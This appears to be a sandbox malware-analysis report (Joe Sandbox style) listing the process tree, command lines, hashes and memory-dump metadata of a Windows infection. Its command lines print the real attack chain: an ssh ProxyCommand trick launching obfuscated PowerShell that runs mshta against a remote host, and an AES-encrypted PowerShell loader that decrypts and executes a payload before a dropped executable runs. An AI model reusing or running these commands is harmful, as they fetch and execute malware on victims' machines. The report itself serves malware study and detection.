                                                                        Data Ascii: @@S2qAOutString@@S4qAInOutString@@S>qAAsAnsi@ @S@@>rAAsAnsi@ @S@@


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:02:38:15
                                                                        Start date:17/12/2024
                                                                        Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)" .
                                                                        Imagebase:0x7ff6f98c0000
                                                                        File size:946'176 bytes
                                                                        MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:02:38:15
                                                                        Start date:17/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff704000000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:02:38:15
                                                                        Start date:17/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)
                                                                        Imagebase:0x7ff63c0a0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:02:38:17
                                                                        Start date:17/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://static.klipxuhaq.shop/BUX6P.mp4"
                                                                        Imagebase:0x7ff63c0a0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:02:38:17
                                                                        Start date:17/12/2024
                                                                        Path:C:\Windows\System32\mshta.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4
                                                                        Imagebase:0x7ff669e70000
                                                                        File size:14'848 bytes
                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:02:38:21
                                                                        Start date:17/12/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff7d3e90000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:8
                                                                        Start time:02:38:21
                                                                        Start date:17/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)
                                                                        Imagebase:0x7ff63c0a0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:02:38:21
                                                                        Start date:17/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff704000000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:02:38:25
                                                                        Start date:17/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Mcyga.pdf"
                                                                        Imagebase:0x7ff77b230000
                                                                        File size:5'641'176 bytes
                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:11
                                                                        Start time:02:38:26
                                                                        Start date:17/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                        Imagebase:0x7ff763240000
                                                                        File size:3'581'912 bytes
                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:12
                                                                        Start time:02:38:26
                                                                        Start date:17/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,16971974731040097592,9100869512474091707,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                        Imagebase:0x7ff763240000
                                                                        File size:3'581'912 bytes
                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:18
                                                                        Start time:02:38:49
                                                                        Start date:17/12/2024
                                                                        Path:C:\Users\user\AppData\Roaming\bdd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\bdd.exe"
                                                                        Imagebase:0x400000
                                                                        File size:14'104'424 bytes
                                                                        MD5 hash:1B4971205E6226DF6B9B11527F70A14F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 00007FFE166133B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2353965857.00007FFE16610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16610000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffe16610000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e2ee47846a40d26ca6ad4efb48b22efc69babe9b2f5a06a55caa04eb5bd6814
                                                                          • Instruction ID: 85d39266b0d253e26b7621896d207f4f5eb0eb328d1e4dd368f8535ab6140bda
                                                                          • Opcode Fuzzy Hash: 0e2ee47846a40d26ca6ad4efb48b22efc69babe9b2f5a06a55caa04eb5bd6814
                                                                          • Instruction Fuzzy Hash: 4301677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3661DA36E892CB46

                                                                          Executed Functions

                                                                          Function 0000015CF8AE0F79 Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000003.2875086825.0000015CF8AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000015CF8AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_3_15cf8ae0000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                          • Instruction ID: 67cbf44c9d116d5c33489e3f5b11dea32af7040c801743d128f6c4ed23bd1785
                                                                          • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                          • Instruction Fuzzy Hash: F990021549591699D81415D20C453DD6041B3C8251FD44C91441694144D48D02B651B2
                                                                          Function 0000015CF8AE0F89 Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000003.2875086825.0000015CF8AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000015CF8AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_3_15cf8ae0000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                          • Instruction ID: 67cbf44c9d116d5c33489e3f5b11dea32af7040c801743d128f6c4ed23bd1785
                                                                          • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                          • Instruction Fuzzy Hash: F990021549591699D81415D20C453DD6041B3C8251FD44C91441694144D48D02B651B2
                                                                          Function 0000015CF8AE0F99 Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000003.2875086825.0000015CF8AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000015CF8AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_3_15cf8ae0000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                          • Instruction ID: 67cbf44c9d116d5c33489e3f5b11dea32af7040c801743d128f6c4ed23bd1785
                                                                          • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                          • Instruction Fuzzy Hash: F990021549591699D81415D20C453DD6041B3C8251FD44C91441694144D48D02B651B2
                                                                          Function 0000015CF8AE0F81 Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000003.2875086825.0000015CF8AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000015CF8AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_3_15cf8ae0000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                          • Instruction ID: 67cbf44c9d116d5c33489e3f5b11dea32af7040c801743d128f6c4ed23bd1785
                                                                          • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                          • Instruction Fuzzy Hash: F990021549591699D81415D20C453DD6041B3C8251FD44C91441694144D48D02B651B2
                                                                          Function 0000015CF8AE0FC1 Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000003.2875086825.0000015CF8AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000015CF8AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_3_15cf8ae0000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                          • Instruction ID: 67cbf44c9d116d5c33489e3f5b11dea32af7040c801743d128f6c4ed23bd1785
                                                                          • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                          • Instruction Fuzzy Hash: F990021549591699D81415D20C453DD6041B3C8251FD44C91441694144D48D02B651B2

                                                                          Executed Functions

                                                                          Function 00007FFE15D33A7D Relevance: .1, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2867279760.00007FFE15D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE15D30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffe15d30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 807f5bae3cda8f81ccb8e2212ae1d70787165b9a6b8275ab75bf58c458e9689d
                                                                          • Instruction ID: 6edbf9c9bf3e3667726b417ce88685ac6f5105dc9c3d806f4a9d93dc39fe6cc1
                                                                          • Opcode Fuzzy Hash: 807f5bae3cda8f81ccb8e2212ae1d70787165b9a6b8275ab75bf58c458e9689d
                                                                          • Instruction Fuzzy Hash: 8721F43171DE4D0FEBD4EB2D9855AB573E1EBA922175401BAD44DC32B6DE25E842C340
                                                                          Function 00007FFE15E03801 Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2868244057.00007FFE15E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE15E00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffe15e00000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 16a6bf52cc38f55a317f1075abe17ee8829e0b5f77e6cef0fe65873165788c73
                                                                          • Instruction ID: 9147f29eb90d46ccc766a43364296456367a521e743edc49c1b9e499a1790e20
                                                                          • Opcode Fuzzy Hash: 16a6bf52cc38f55a317f1075abe17ee8829e0b5f77e6cef0fe65873165788c73
                                                                          • Instruction Fuzzy Hash: DA018F22F19F8A0BE396921D18152BAA6D2FFD9A70B6941FAC41CC32F2DE199C014350
                                                                          Function 00007FFE15D33A05 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2867279760.00007FFE15D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE15D30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffe15d30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37506c4a2d6d72408ac2a856b6c146d163bf9cf82242193b632eb88ba76e4576
                                                                          • Instruction ID: e0ad629cee87a9b7d74ed55f1370b863f7840727d0d1e45e78c5bac7e0f87109
                                                                          • Opcode Fuzzy Hash: 37506c4a2d6d72408ac2a856b6c146d163bf9cf82242193b632eb88ba76e4576
                                                                          • Instruction Fuzzy Hash: BA01677111CB0C4FD744EF0CE451AA6B7E0FB95364F10056DE58AC3665DB36E891CB45
                                                                          Function 00007FFE15E03B61 Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2868244057.00007FFE15E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE15E00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffe15e00000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1825d8d6cb0cccb5b93d712d797a714e7c86ab71c13fbcb4a9d53e2612d85520
                                                                          • Instruction ID: 11ba7c8c746c01fdde4b1bdf0422c9d27966d1bc91e067fe164dc500d914228d
                                                                          • Opcode Fuzzy Hash: 1825d8d6cb0cccb5b93d712d797a714e7c86ab71c13fbcb4a9d53e2612d85520
                                                                          • Instruction Fuzzy Hash: 44E0A036E0CA129BA210A209A94B4BA73C1EF05234B5000F6E10D83473CA1568518944
                                                                          Function 00007FFE15E004D8 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2868244057.00007FFE15E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE15E00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffe15e00000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c1da384717edbf4eb32e34fc97f86cc2f5b5b7ee40cff0aeba77216b1b8e30b0
                                                                          • Instruction ID: 77fda09bfd3a2f98d1388b53b6a3b85179ed9e8606cb9610a71b706b2f698945
                                                                          • Opcode Fuzzy Hash: c1da384717edbf4eb32e34fc97f86cc2f5b5b7ee40cff0aeba77216b1b8e30b0
                                                                          • Instruction Fuzzy Hash: 24D05E33B0DD2D4E9BA1928C68592ED7780EB486357540267D84DE2150D911891147C0
                                                                          Function 00007FFE15E0385A Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2868244057.00007FFE15E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE15E00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffe15e00000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fd7aeef9c3b77e067f01dc28db4464184166cf900df236acc7ac315b44dbb642
                                                                          • Instruction ID: b21860bfc9c6d33270f32ba4e3e6c57c922a3031a72724dca3cd995bd6716029
                                                                          • Opcode Fuzzy Hash: fd7aeef9c3b77e067f01dc28db4464184166cf900df236acc7ac315b44dbb642
                                                                          • Instruction Fuzzy Hash: F0D01760B18F0F4AE38AA62D040823791D3AFDCA2276540F9840DC22B5DE38D8424300

                                                                          Executed Functions

                                                                          Function 00502F90 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2703916709.0000000000502000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000012.00000002.2703870755.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2703916709.000000000040D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2703916709.000000000048A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2703916709.00000000005EB000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2703916709.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2703916709.00000000007FD000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2704734357.0000000000CEE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2704805846.0000000000CF1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2704917586.0000000000CF8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2704917586.0000000000CFB000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2705041065.0000000000CFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2705116540.0000000000D01000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2705204416.0000000000D04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2705333425.0000000000D07000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2705729986.0000000000D13000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2705781661.0000000000D19000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2705819330.0000000000D25000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2705902297.0000000000D28000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2705962122.0000000000D2C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2706004172.0000000000D2F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2706076465.0000000000D44000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2706175826.0000000000DA3000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2706175826.0000000000DA7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2706175826.0000000000DA9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2706175826.0000000000DAD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2706334410.0000000000DF3000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 00000012.00000002.2706407192.0000000000DF9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_400000_bdd.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 63641e619a1ebfb2d67102de08a66a2d6436829a5a2663a6a13eff08e7189dd5
                                                                          • Instruction ID: 07242ce6c80bf51b08c2cff10bd8e37dda8d9b6e3685e1347264c3990b947222
                                                                          • Opcode Fuzzy Hash: 63641e619a1ebfb2d67102de08a66a2d6436829a5a2663a6a13eff08e7189dd5
                                                                          • Instruction Fuzzy Hash: 56F02B36215BC4CCD7609F36D8817DA3BA9F349B88F14842ADA8D9BB28DF30D2549745